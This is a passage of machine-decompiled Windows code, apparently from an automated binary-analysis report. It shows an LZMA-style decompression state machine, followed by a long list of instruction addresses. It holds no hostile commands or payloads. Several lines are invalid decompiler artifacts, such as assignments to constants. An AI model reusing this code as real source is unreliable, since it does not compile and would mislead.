							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406131
0x00406131
0x00406136
0x004061ad
0x004061b4
0x004061be
0x0040679d
0x0040679d
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00406813
0x00406813
0x00406819
0x00406819
0x00000000
0x004067ee
0x004067ee
0x004067f2
0x004069a1
0x00000000
0x004069a1
0x004067fe
0x00406805
0x0040680d
0x00406810
0x00000000
0x00406810
0x00406138
0x00406138
0x0040613c
0x00406144
0x00406147
0x00406149
0x0040614c
0x0040614e
0x00406153
0x00406156
0x0040615d
0x00406164
0x00406167
0x00406172
0x0040617a
0x0040617a
0x00406174
0x00406174
0x00406174
0x00406169
0x00406169
0x00406169
0x00406181
0x0040619f
0x004061a1
0x00406374
0x00406374
0x00406377
0x0040637a
0x0040637d
0x00406380
0x00406383
0x00406386
0x00406389
0x0040638c
0x00406392
0x004063aa
0x004063ad
0x004063b0
0x004063b3
0x004063b3
0x004063b6
0x004063bc
0x00406394
0x00406394
0x0040639c
0x004063a1
0x004063a3
0x004063a5
0x004063a5
0x004063c6
0x004063c9
0x0040636c
0x00406372
0x00000000
0x00000000
0x00000000
0x004063cb
0x00406347
0x0040634b
0x00406953
0x00000000
0x00406953
0x00406351
0x00406354
0x00406357
0x0040635b
0x0040635e
0x00406364
0x00406366
0x00406366
0x00406369
0x00000000
0x00406369
0x00406183
0x00406183
0x00406186
0x0040618c
0x0040618e
0x0040618e
0x00406191
0x00406194
0x00406196
0x00406197
0x0040619a
0x00406207
0x00406207
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x00406218
0x0040621b
0x0040621d
0x00406223
0x00406226
0x00406229
0x0040622c
0x0040622f
0x00406235
0x00406251
0x00406254
0x00406257
0x0040625a
0x00406261
0x00406267
0x0040626b
0x00406237
0x00406237
0x0040623b
0x00406243
0x00406248
0x0040624a
0x0040624c
0x0040624c
0x00406275
0x00406278
0x004061ef
0x004061ef
0x004061f5
0x004062a8
0x004062ae
0x00000000
0x00000000
0x004062b0
0x004062b3
0x004062b6
0x004062b9
0x004062bc
0x004062bf
0x004062c2
0x004062c5
0x004062c8
0x004062ce
0x004062e6
0x004062e9
0x004062ec
0x004062ef
0x004062ef
0x004062f2
0x004062f8
0x004062d0
0x004062d0
0x004062d8
0x004062dd
0x004062df
0x004062e1
0x004062e1
0x00406302
0x00406305
0x00406283
0x00406287
0x00406947
0x00000000
0x00406947
0x0040628d
0x00406290
0x00406293
0x00406297
0x0040629a
0x004062a0
0x004062a2
0x004062a2
0x004062a5
0x004062a5
0x00406305
0x0040630c
0x0040630c
0x0040630c
0x00406310
0x00406310
0x00406313
0x00406316
0x0040631a
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x004064dc
0x004064dc
0x004064df
0x004064df
0x00000000
0x004064df
0x00406201
0x00000000
0x00000000
0x00000000
0x0040627e
0x004061ca
0x004061ce
0x0040693b
0x004069b7
0x004069bf
0x004069c6
0x004069c8
0x004069cf
0x004069d3
0x004069d3
0x004061d4
0x004061d7
0x004061da
0x004061de
0x004061e1
0x004061e7
0x004061e9
0x004061e9
0x004061ec
0x00000000
0x004061ec
0x00406278
0x00406181
0x00405fb5
0x00405fb5
0x00405fbe
0x004069cc
0x004069cc
0x00000000
0x004069cc
0x00405fc4
0x00000000
0x00405fcf
0x00000000
0x00000000
0x00405fd8
0x00405fdb
0x00405fde
0x00405fe2
0x00000000
0x00000000
0x00405fe8
0x00405feb
0x00405fed
0x00405fee
0x00405ff1
0x00405ff3
0x00405ff4
0x00405ff6
0x00405ff9
0x00405ffe
0x00406003
0x0040600c
0x0040601f
0x00406022
0x0040602e
0x00406056
0x00406058
0x00406066
0x00406066
0x0040606a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605a
0x0040605a
0x0040605d
0x0040605e
0x0040605e
0x00000000
0x0040605a
0x00406034
0x00406039
0x00406039
0x00406042
0x0040604a
0x0040604d
0x00000000
0x00406053
0x00406053
0x00000000
0x00406053
0x00000000
0x00406070
0x00406070
0x00406074
0x00406920
0x00000000
0x00406920
0x0040607d
0x0040608d
0x00406090
0x00406093
0x00406093
0x00406093
0x00406096
0x0040609a
0x00000000
0x00000000
0x0040609c
0x004060a2
0x004060cc
0x004060d2
0x004060d9
0x00000000
0x004060d9
0x004060a8
0x004060ab
0x004060b0
0x004060b0
0x004060bb
0x004060c3
0x004060c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040610b
0x00406111
0x00406114
0x00406121
0x00406129
0x00000000
0x00000000
0x004060e0
0x004060e0
0x004060e4
0x0040692f
0x00000000
0x0040692f
0x004060f0
0x004060fb
0x004060fb
0x004060fb
0x004060fe
0x00406101
0x00406104
0x00406109
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004063d0
0x004063d4
0x004063f2
0x004063f5
0x004063fc
0x004063ff
0x00406402
0x00406405
0x00406408
0x0040640b
0x0040640d
0x00406414
0x00406415
0x00406417
0x0040641a
0x0040641d
0x00406420
0x00406420
0x00406425
0x00000000
0x00406425
0x004063d6
0x004063d9
0x004063dc
0x004063e6
0x00000000
0x00000000
0x0040643a
0x0040643e
0x00406461
0x00406464
0x00406467
0x00406471
0x00406440
0x00406440
0x00406443
0x00406446
0x00406449
0x00406456
0x00406459
0x00406459
0x00000000
0x00000000
0x0040647d
0x00406481
0x00000000
0x00000000
0x00406487
0x0040648b
0x00000000
0x00000000
0x00406491
0x00406493
0x00406497
0x00406497
0x0040649a
0x0040649e
0x00000000
0x00000000
0x004064ee
0x004064f2
0x004064f9
0x004064fc
0x004064ff
0x00406509
0x00000000
0x00406509
0x004064f4
0x00000000
0x00000000
0x00406515
0x00406519
0x00406520
0x00406523
0x00406526
0x0040651b
0x0040651b
0x0040651b
0x00406529
0x0040652c
0x0040652f
0x0040652f
0x00406532
0x00406535
0x00406538
0x00406538
0x0040653b
0x00406542
0x00406547
0x00000000
0x00000000
0x004065d5
0x004065d5
0x004065d9
0x00406977
0x00000000
0x00406977
0x004065df
0x004065e2
0x004065e5
0x004065e9
0x004065ec
0x004065f2
0x004065f4
0x004065f4
0x004065f4
0x004065f7
0x004065fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406658
0x00406658
0x0040665c
0x00406983
0x00000000
0x00406983
0x00406662
0x00406665
0x00406668
0x0040666c
0x0040666f
0x00406675
0x00406677
0x00406677
0x00406677
0x0040667a
0x00000000
0x00000000
0x00406428
0x00406428
0x0040642b
0x00000000
0x00000000
0x00406767
0x0040676b
0x0040678d
0x00406790
0x0040679a
0x00000000
0x0040679a
0x0040676d
0x00406770
0x00406774
0x00406777
0x00406777
0x0040677a
0x00000000
0x00000000
0x00406824
0x00406828
0x00406846
0x00406846
0x00406846
0x0040684d
0x00406854
0x0040685b
0x0040685b
0x00000000
0x0040685b
0x0040682a
0x0040682d
0x00406830
0x00406833
0x0040683a
0x0040677e
0x0040677e
0x00406781
0x00000000
0x00000000
0x00406915
0x00406918
0x00000000
0x00000000
0x0040654f
0x00406551
0x00406558
0x00406559
0x0040655b
0x0040655e
0x00000000
0x00000000
0x00406566
0x00406569
0x0040656c
0x0040656e
0x00406570
0x00406570
0x00406571
0x00406574
0x0040657b
0x0040657e
0x0040658c
0x00000000
0x00000000
0x00406862
0x00406862
0x00406865
0x0040686c
0x00000000
0x00000000
0x00406871
0x00406871
0x00406875
0x004069ad
0x00000000
0x004069ad
0x0040687b
0x0040687e
0x00406881
0x00406885
0x00406888
0x0040688e
0x00406890
0x00406890
0x00406890
0x00406893
0x00406896
0x00406896
0x00406896
0x00406896
0x00406899
0x00406899
0x0040689d
0x004068fd
0x00406900
0x00406905
0x00406906
0x00406908
0x0040690a
0x0040690d
0x00000000
0x0040690d
0x0040689f
0x004068a5
0x004068a8
0x004068ab
0x004068ae
0x004068b1
0x004068b4
0x004068b7
0x004068ba
0x004068bd
0x004068c0
0x004068d9
0x004068dc
0x004068df
0x004068e2
0x004068e6
0x004068e8
0x004068e8
0x004068e9
0x004068ec
0x004068c2
0x004068c2
0x004068ca
0x004068cf
0x004068d1
0x004068d4
0x004068d4
0x004068ef
0x004068f6
0x00000000
0x004068f8
0x00000000
0x004068f8
0x00000000
0x00406594
0x00406597
0x004065cd
0x004066fd
0x004066fd
0x004066fd
0x004066fd
0x00406700
0x00406700
0x00406703
0x00406705
0x0040698f
0x00000000
0x0040698f
0x0040670b
0x0040670e
0x00000000
0x00000000
0x00406714
0x00406718
0x0040671b
0x0040671b
0x0040671b
0x00000000
0x0040671b
0x00406599
0x0040659b
0x0040659d
